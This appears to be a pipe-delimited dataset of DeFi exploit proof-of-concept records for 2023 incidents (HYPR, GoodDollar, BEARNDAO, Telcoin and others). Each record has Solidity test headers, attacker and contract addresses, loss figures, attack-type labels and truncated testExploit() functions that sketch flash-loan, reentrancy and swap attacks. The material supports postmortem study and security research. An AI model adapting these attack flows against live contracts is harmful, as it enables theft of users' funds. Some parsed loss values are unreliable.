"Exploiter HYPR balance before attack", HYPR.balanceOf(address(this)), HYPR.decimals()
);
ChugSplash.initialize(address(this));
ChugSplash.finalizeERC20Withdrawal(
address(HYPR), l2Token, address(ChugSp... | true | ~200K USD$ | https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519 | https://etherscan.io/address/0xba6fa6e8500cd8eeda8ebb9dfbcc554ff4a3eb77 | https://etherscan.io/address/0x40c31236b228935b0329eff066b1ad96e319595e | https://explorer.phalcon.xyz/tx/eth/0x51ce3d9cfc85c1f6a532b908bb2debb16c7569eb8b76effe614016aac6635f65 | $200.0K | 7.17 | medium | HYPR Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$500K
// Attacker : https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05
// Attack Contract : https://bscscan.com/address/0x791626eb05e60fac973646ac8d... | exploit_poc | UnverifiedContr_0x431abb | 2023-12 | UnverifiedContr_0x431abb_exp.sol | flash_loan | 806de7f8c13eb065 | 2026-01-07T10:59:16.530537 | postmortems | bsc | 33,972,111 | ~$500K | 500,000 | https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05 | https://bscscan.com/address/0x791626eb05e60fac973646ac8d67b008b939fe88 | null | null | null | null | true | true | true | high | ~$500K | flash-loan | function testExploit() public {
// Exploiter transfer to attack contract following amounts of tokens (for staking) before attack:
deal(address(TRUST), address(this), 171_150_509_328_412_454 + 283_615_706_379_311_069);
deal(address(KLEN), address(this), 2848 * 1e18 + 2_999_999_999_999_999_999_999... | true | ~$500K | https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05 | https://bscscan.com/address/0x791626eb05e60fac973646ac8d67b008b939fe88 | $500.0K | 8 | high | UnverifiedContr_0x431abb Exploit (2023-12) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : ~$13K (250 COMP Token)
// Attacker : https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569
// Attack Contract : https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13... | exploit_poc | GoodCompound | 2023-12 | GoodCompound_exp.sol | flash_loan | 6615f032074669fa | 2026-01-07T10:59:16.530597 | postmortems | ethereum | 18,759,541 | ~$13K (250 COMP Token) | 13,000 | https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569 | https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13 | https://etherscan.io/address/0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b | https://etherscan.io/tx/0x1106418384414ed56cd7cbb9fedc66a02d39b663d580abc618f2d387348354ab | null | null | true | true | true | medium | ~$13K (250 COMP Token) | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"[Begin] Attacker COMP before exploit", compound_token.balanceOf(profit_receiver), 18
);
address[] memory path = new address[](2);
path[0] = address(compound);
path[1] = address(weth);
uint256[] memo... | true | ~$13K (250 COMP Token) | https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569 | https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13 | https://etherscan.io/address/0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b | https://etherscan.io/tx/0x1106418384414ed56cd7cbb9fedc66a02d39b663d580abc618f2d387348354ab | $13.0K | 10 | high | GoodCompound Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : $3.3K
// Attacker : https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4
// Attack Contract : https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4
// Vulnerable Cont... | exploit_poc | MAMO | 2023-12 | MAMO_exp.sol | flash_loan | 1f3408f89a5fb80f | 2026-01-07T10:59:16.530654 | postmortems | bsc | 34,083,189 | $3.3K | 3,300 | https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4 | https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4 | https://bscscan.com/address/0x5813d7818c9d8f29a9a96b00031ef576e892def4 | https://bscscan.com/tx/0x189a8dc1e0fea34fd7f5fa78c6e9bdf099a8d575ff5c557fa30d90c6acd0b29f | null | null | true | true | true | low | $3.3K | flash-loan | false | $3.3K | https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4 | https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4 | https://bscscan.com/address/0x5813d7818c9d8f29a9a96b00031ef576e892def4 | https://bscscan.com/tx/0x189a8dc1e0fea34fd7f5fa78c6e9bdf099a8d575ff5c557fa30d90c6acd0b29f | $3.3K | 6.67 | medium | MAMO Exploit (2023-12) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~90K (info from hacked.slowmist.io)
// Attacker : https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa
// Attacker Contract : https://etherscan.io/add... | exploit_poc | PineProtocol | 2023-12 | PineProtocol_exp.sol | flash_loan | a212c9077f31794f | 2026-01-07T10:59:16.530700 | postmortems | ethereum | 18,835,344 | ~90K (info from hacked.slowmist.io) | 90,000 | https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa | null | null | https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d | null | null | true | true | true | medium | ~90K (info from hacked.slowmist.io) | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"[Before loan repay] Vault WETH balance after borrowing ~4 WETH to exploiter",
WETH.balanceOf(pineGnosisSafe),
18
);
emit log_named_address(
"[Before loan repay] Owner of PPG NFT id 3_324... | true | ~90K (info from hacked.slowmist.io) | https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa | https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d | $90.0K | 8.82 | high | PineProtocol Exploit (2023-12) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$769K
// Attacker : https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5
// Attack Contract : https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb5... | exploit_poc | BEARNDAO | 2023-12 | BEARNDAO_exp.sol | flash_loan | 0175c586f8681167 | 2026-01-07T10:59:16.530754 | postmortems | bsc | 34,099,688 | ~$769K | 769,000 | https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5 | https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb57eb1deba4fdaaa | null | https://explorer.phalcon.xyz/tx/bsc/0x51913be3f31d5ddbfc77da789e5f9653ed6b219a52772309802226445a1edd5f | null | null | true | true | true | high | ~$769K | flash-loan | function testExploit() public {
deal(address(WBNB), address(this), 0);
deal(address(BUSD), address(this), 0);
emit log_named_decimal_uint(
"Exploiter amount of BUSD before attack", BUSD.balanceOf(address(this)), BUSD.decimals()
);
CAKE_WBNB.swap(0, 10_000 * 1e18, add... | true | ~$769K | https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5 | https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb57eb1deba4fdaaa | https://explorer.phalcon.xyz/tx/bsc/0x51913be3f31d5ddbfc77da789e5f9653ed6b219a52772309802226445a1edd5f | $769.0K | 8.21 | high | BEARNDAO Exploit (2023-12) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~2.4 $WBNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
// Vulnerable Contract : https://bscscan... | exploit_poc | HNet | 2023-12 | HNet_exp.sol | flash_loan | 4467e99274626bc2 | 2026-01-07T10:59:16.530802 | postmortems | bsc | 34,141,220 | ~2.4 $WBNB | 2.4 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f | https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90 | https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8 | null | null | true | false | true | low | ~2.4 $WBNB | flash-loan | function testExploit() public {
emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)));
HNet.approve(address(Router), type(uint256).max);
WBNB.approve(address(Router), type(uint256).max);
DODO.flashLoan(0.1 * 1e18, 0, address(this), new bytes(1));
... | true | ~2.4 $WBNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f | https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90 | https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8 | $2 | 9.38 | high | HNet Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer)
// Exploiter : https://etherscan.io/address/0x6738fa889ff31f82d9fe8862ec025dbe318f3fde
// At... | exploit_poc | GoodDollar | 2023-12 | GoodDollar_exp.sol | flash_loan | 2ddcd07ca2e68e35 | 2026-01-07T10:59:16.530855 | postmortems | ethereum | 18,802,014 | ~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer) | 2,000,000 | null | https://etherscan.io/address/0xf06ab383528f51da67e2b2407327731770156ed6 | null | https://app.blocksec.com/explorer/tx/eth/0x726459a46839c915ee2fb3d8de7f986e3c7391c605b7a622112161a84c7384d0 | null | null | true | true | true | critical | ~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer) | flash-loan | function testExploit() public {
deal(address(this), 0);
emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals());
emit log_named_decimal_uint(
"Exploiter GoodDollarToken balance before attack",
GoodDollarToken.balan... | true | ~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer) | https://etherscan.io/address/0xf06ab383528f51da67e2b2407327731770156ed6 | https://app.blocksec.com/explorer/tx/eth/0x726459a46839c915ee2fb3d8de7f986e3c7391c605b7a622112161a84c7384d0 | $2.00M | 9 | high | GoodDollar Exploit (2023-12) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~3200 $BUSD
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d
// Vulnerable Contract : https://bscsca... | exploit_poc | CCV | 2023-12 | CCV_exp.sol | flash_loan | eb8247196bef82b0 | 2026-01-07T10:59:16.530915 | postmortems | bsc | 34,739,874 | ~3200 $BUSD | 3,200 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d | https://bscscan.com/address/0x37177ccc66ef919894cef37596bbebd76e7a40b2 | https://bscscan.com/tx/0x6ba4152db9da45f5751f2c083bf77d4b3385373d5660c51fe2e4382718afd9b4 | null | null | true | false | true | low | ~3200 $BUSD | flash-loan | function testExploit() public {
BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this)));
emit log_named_uint("Attacker BUSD balance before attack:", BUSD.balanceOf(address(this)));
CCV.approve(address(Router), type(uint256).max);
BUSD.approve(add... | true | ~3200 $BUSD | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d | https://bscscan.com/address/0x37177ccc66ef919894cef37596bbebd76e7a40b2 | https://bscscan.com/tx/0x6ba4152db9da45f5751f2c083bf77d4b3385373d5660c51fe2e4382718afd9b4 | $3.2K | 8.66 | high | CCV Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$2.3K
// Attacker : https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198
// Attack Contract : https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff... | exploit_poc | KEST | 2023-12 | KEST_exp.sol | flash_loan | e3109927ba4e1f3e | 2026-01-07T10:59:16.530960 | postmortems | bsc | null | ~$2.3K | 2,300 | https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198 | https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff7a4d871eee4aa | https://bscscan.com/address/0x7dda132dd57b773a94e27c5caa97834a73510429 | https://app.blocksec.com/explorer/tx/bsc/0x2fcee04e64e54f3dd9c15db9ae44e4cbdd57ab4c6f01941a3acf470dc60bfc16 | null | https://x.com/MetaSec_xyz/status/1736077719849623718 | true | true | true | low | ~$2.3K | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
address[] memory assets = new address[](1);
assets[0] = address(WBNB);
uint256[] memory amounts = new uint256[](1);
... | true | ~$2.3K | https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198 | https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff7a4d871eee4aa | https://bscscan.com/address/0x7dda132dd57b773a94e27c5caa97834a73510429 | https://app.blocksec.com/explorer/tx/bsc/0x2fcee04e64e54f3dd9c15db9ae44e4cbdd57ab4c6f01941a3acf470dc60bfc16 | https://x.com/MetaSec_xyz/status/1736077719849623718 | $2.3K | 9.64 | high | KEST Exploit (2023-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~320K
// Attacker : https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681
// Attack Contract : https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2... | exploit_poc | ChannelsFinance | 2023-12 | ChannelsFinance_exp.sol | null | e7278b2e6dd9b711 | 2026-01-07T10:59:16.531044 | postmortems | bsc | 34,806,205 | ~320K | 320,000 | https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681 | https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2bcdc3bf738e | https://bscscan.com/address/0x93790c641d029d1cbd779d87b88f67704b6a8f4c | https://app.blocksec.com/explorer/tx/bsc/0x711cc4ceb9701d317fe9aa47187425e16dae7d5a0113f1430e891018262f8fb5 | null | null | true | true | false | high | ~320K | unknown | function testExploit() public {
// Starting balances. Exploiter transferred amounts of tokens to attack contract before first attack tx
// Transfer txs:
// PancakeSwap Token: https://app.blocksec.com/explorer/tx/bsc/0x0237855c63eb85c5f437fba5267cc869a08c58a49501e3e5ebec9990bdd97565
deal(... | true | ~320K | https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681 | https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2bcdc3bf738e | https://bscscan.com/address/0x93790c641d029d1cbd779d87b88f67704b6a8f4c | https://app.blocksec.com/explorer/tx/bsc/0x711cc4ceb9701d317fe9aa47187425e16dae7d5a0113f1430e891018262f8fb5 | $320.0K | 9 | high | ChannelsFinance Exploit (2023-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Attack tx: https://explorer.phalcon.xyz/tx/bsc/0x93ae5f0a121d5e1aadae052c36bc5ecf2d406d35222f4c6a5d63fef1d6de1081
Tweet alert: https://twitter.com/Phalcon_xyz/status/1737355152779030570... | exploit_poc | TransitFinance | 2023-12 | TransitFinance_exp.sol | null | 771f63c12275c3a3 | 2026-01-07T10:59:16.531118 | postmortems | unknown | 34,506,417 | null | null | null | null | null | https://explorer.phalcon.xyz/tx/bsc/0x93ae5f0a121d5e1aadae052c36bc5ecf2d406d35222f4c6a5d63fef1d6de1081 | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("Balance BNB before attack", address(this).balance, 18);
emit log_named_decimal_uint("Balance USD of router", IERC20(usd).balanceOf(router), 18);
uint256[] memory pools = new uint256[](2);
pools[0] = uint256(uint160(address(this... | true | Unknown | 4.82 | low | TransitFinance Exploit (2023-12) | false | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1,24M
// Attacker : https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7
// Vulnerable Contract : https://polygonscan.com/address/0x56bcadff30680e... | exploit_poc | Telcoin | 2023-12 | Telcoin_exp.sol | null | c95e98acf90a1121 | 2026-01-07T10:59:16.531177 | postmortems | polygon | 51,546,495 | ~1,24M | 1 | https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7 | null | https://polygonscan.com/address/0x56bcadff30680ebb540a84d75c182a5dc61981c0 | null | null | null | true | true | false | low | ~1,24M | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker TEL balance before exploit", TEL.balanceOf(address(this)), TEL.decimals());
bytes32 cloneableProxyPackedSlot0 = vm.load(address(CloneableProxy), bytes32(uint256(0)));
console.log("----------------------------------------------... | true | ~1,24M | https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7 | https://polygonscan.com/address/0x56bcadff30680ebb540a84d75c182a5dc61981c0 | $1 | 7.02 | medium | Telcoin Exploit (2023-12) | true | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~40 eth
// Attacker : https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750
// Attack Contract : https://etherscan.io/address/0x6ce5a85cff4c70591da82d... | exploit_poc | FloorDAO | 2023-09 | FloorDAO_exp.sol | null | 2114ffc6c03449fb | 2026-01-07T10:59:16.531231 | postmortems | ethereum | 18,068,772 | ~40 eth | 40 | https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750 | https://etherscan.io/address/0x6ce5a85cff4c70591da82de5eb91c3fa38b40595 | null | null | null | null | true | true | false | low | ~40 eth | unknown | function testExploit() public {
flashAmount = floor.balanceOf(address(floorUniPool)) - 1;
floorUniPool.flash(address(this), 0, flashAmount, "");
uint256 profitAmount = floor.balanceOf(address(this));
emit log_named_decimal_uint("floor token balance after exploit", profitAmount, floor.de... | true | https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750 | https://etherscan.io/address/0x6ce5a85cff4c70591da82de5eb91c3fa38b40595 | $40 | 5.78 | medium | FloorDAO Exploit (2023-09) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 1 NFT (ID: 4689)
// Attacker : https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832
// Attacker Contract : https://etherscan.io/address/0x9d9820f10772... | exploit_poc | uniclyNFT | 2023-09 | uniclyNFT_exp.sol | reentrancy | 88490b04eac27cae | 2026-01-07T10:59:16.531285 | postmortems | ethereum | 18,133,171 | 1 NFT (ID: 4689) | 1 | https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832 | null | https://etherscan.io/address/0xd3c41c85be295607e8ea5c58487ec5894300ee67 | https://etherscan.io/tx/0xc42fe1ce2516e125a386d198703b2422aa0190b25ef6a7b0a1d3c6f5d199ffad | null | null | true | true | true | low | 1 NFT (ID: 4689) | reentrancy | function testExploit() public {
// Start with the below amount of WETH
deal(address(WETH), address(this), 500e15);
// Preparation phase
uJENNY.approve(address(PointFarm), type(uint256).max);
WETHToUJENNY();
uint256 amtuJENNY = uJENNY.balanceOf(address(this));
Poin... | true | 1 NFT (ID: 4689) | https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832 | https://etherscan.io/address/0xd3c41c85be295607e8ea5c58487ec5894300ee67 | https://etherscan.io/tx/0xc42fe1ce2516e125a386d198703b2422aa0190b25ef6a7b0a1d3c6f5d199ffad | $1 | 9.5 | high | uniclyNFT Exploit (2023-09) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~30K USD$
// Attacker : https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04
// Attack Contract : https://etherscan.io/address/0x8c425ee62d18b65cc9757... | exploit_poc | CEXISWAP | 2023-09 | CEXISWAP_exp.sol | null | 0c40609c0bd05403 | 2026-01-07T10:59:16.531342 | postmortems | ethereum | 18,182,605 | ~30K USD$ | 30,000 | https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04 | https://etherscan.io/address/0x8c425ee62d18b65cc975767c27c42de548d133a1 | https://etherscan.io/address/0xb8a5890d53df78dee6182a6c0968696e827e3305 | https://etherscan.io/tx/0xede72a74d8398875b42d92c550539d72c830d3c3271a7641ee1843dc105de59e | null | null | true | true | false | medium | ~30K USD$ | unknown | function testExploit() public {
exploiter = new Exploiter();
exploiter.exploit();
emit log_named_decimal_uint("Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 6);
}
}
contract Exploiter {
ICEXISWAP private constant CEXISWAP = ICEXISWAP(0xB8a5890D53dF78dEE6182A6C0968... | true | ~30K USD$ | https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04 | https://etherscan.io/address/0x8c425ee62d18b65cc975767c27c42de548d133a1 | https://etherscan.io/address/0xb8a5890d53df78dee6182a6c0968696e827e3305 | https://etherscan.io/tx/0xede72a74d8398875b42d92c550539d72c830d3c3271a7641ee1843dc105de59e | $30.0K | 7.3 | medium | CEXISWAP Exploit (2023-09) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$38K
// Attacker : https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
// Attacker Contract : https://bscscan.com/address/0x9180981034364f683ea25bcce... | exploit_poc | BFCToken | 2023-09 | BFCToken_exp.sol | null | d8fcf02c8898d946 | 2026-01-07T10:59:16.531393 | postmortems | bsc | 31,599,443 | ~$38K | 38,000 | https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 | null | https://bscscan.com/address/0x595eac4a0ce9b7175a99094680fbe55a774b5464 | https://bscscan.com/tx/0x8ee76291c1b46d267431d2a528fa7f3ea7035629500bba4f87a69b88fcaf6e23 | null | null | true | true | false | medium | ~$38K | unknown | function testExploit() public {
deal(address(BUSDT), address(this), 0);
deal(address(this), 0);
bytes memory swapData = abi.encode(address(BFC), address(BUSDT_BFC), 400_000 * 1e18);
BUSDT_WBNB.swap(400_000 * 1e18, 0, address(this), swapData);
swapBUSDTToBNB();
emit log_n... | true | ~$38K | https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 | https://bscscan.com/address/0x595eac4a0ce9b7175a99094680fbe55a774b5464 | https://bscscan.com/tx/0x8ee76291c1b46d267431d2a528fa7f3ea7035629500bba4f87a69b88fcaf6e23 | $38.0K | 8.06 | high | BFCToken Exploit (2023-09) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$61K
// Attacker : https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53
// Attacker Contract : https://etherscan.io/address/0xc44ea7650b27f83a6b310a8... | exploit_poc | 0x0DEX | 2023-09 | 0x0DEX_exp.sol | flash_loan | 575c03a8df0ad9eb | 2026-01-07T10:59:16.531448 | postmortems | ethereum | 18,115,707 | ~$61K | 61,000 | https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53 | null | https://etherscan.io/address/0x29d2bcf0d70f95ce16697e645e2b76d218d66109 | https://explorer.phalcon.xyz/tx/eth/0x00b375f8e90fc54c1345b33c686977ebec26877e2c8cac165429927a6c9bdbec | null | null | true | true | true | medium | ~$61K | flash-loan | function testExploit() public {
deal(address(this), 0 ether);
uint256 loan = 11 ether;
address[] memory tokens = new address[](1);
tokens[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = loan;
BalancerVault.flashLoan(address(this), t... | true | ~$61K | https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53 | https://etherscan.io/address/0x29d2bcf0d70f95ce16697e645e2b76d218d66109 | https://explorer.phalcon.xyz/tx/eth/0x00b375f8e90fc54c1345b33c686977ebec26877e2c8cac165429927a6c9bdbec | $61.0K | 10 | high | 0x0DEX Exploit (2023-09) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~$2.4ETH
// Attacker : https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6
// Attack Contract : https://etherscan.io/address/0x154863eb71De4a34F88Ea... | exploit_poc | JumpFarm | 2023-09 | JumpFarm_exp.sol | flash_loan | ae87223516292c08 | 2026-01-07T10:59:16.531518 | postmortems | ethereum | 18,070,346 | ~$2.4ETH | 2.4 | https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6 | https://etherscan.io/address/0x154863eb71De4a34F88Ea57450840eAB1c71abA6 | null | null | null | null | true | true | true | low | ~$2.4ETH | flash-loan | function testExploit() public {
address[] memory token = new address[](1);
token[0] = address(weth);
uint256[] memory amount = new uint256[](1);
amount[0] = 15 * 1 ether;
balancer.flashLoan(address(this), token, amount, hex"28");
// weth.withdraw(weth.balanceOf(address(t... | true | https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6 | https://etherscan.io/address/0x154863eb71De4a34F88Ea57450840eAB1c71abA6 | $2 | 6.71 | medium | JumpFarm Exploit (2023-09) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~78K USD$
// Attacker : https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
// Attack Contract : https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99... | exploit_poc | Kub_Split | 2023-09 | Kub_Split_exp.sol | flash_loan | 14c4f3f723bbbcb2 | 2026-01-07T10:59:16.531570 | postmortems | bsc | 32,021,100 | ~78K USD$ | 78,000 | https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e | https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99f4b4e76785de26b5d | https://bscscan.com/address/0xc98e183d2e975f0567115cb13af893f0e3c0d0bd | https://bscscan.com/tx/0x2b0877b5495065e90d956e44ffde6aaee5e0fcf99dd3c86f5ff53e33774ea52d | null | null | true | true | true | medium | ~78K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
deal(address(fakeUSDC), address(this), 10_000 * 1e18);
emit log_named_decimal_uint(
"Attacker BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
emit log_named_dec... | true | ~78K USD$ | https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e | https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99f4b4e76785de26b5d | https://bscscan.com/address/0xc98e183d2e975f0567115cb13af893f0e3c0d0bd | https://bscscan.com/tx/0x2b0877b5495065e90d956e44ffde6aaee5e0fcf99dd3c86f5ff53e33774ea52d | $78.0K | 10 | high | Kub_Split Exploit (2023-09) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$16K
// Attacker : https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26
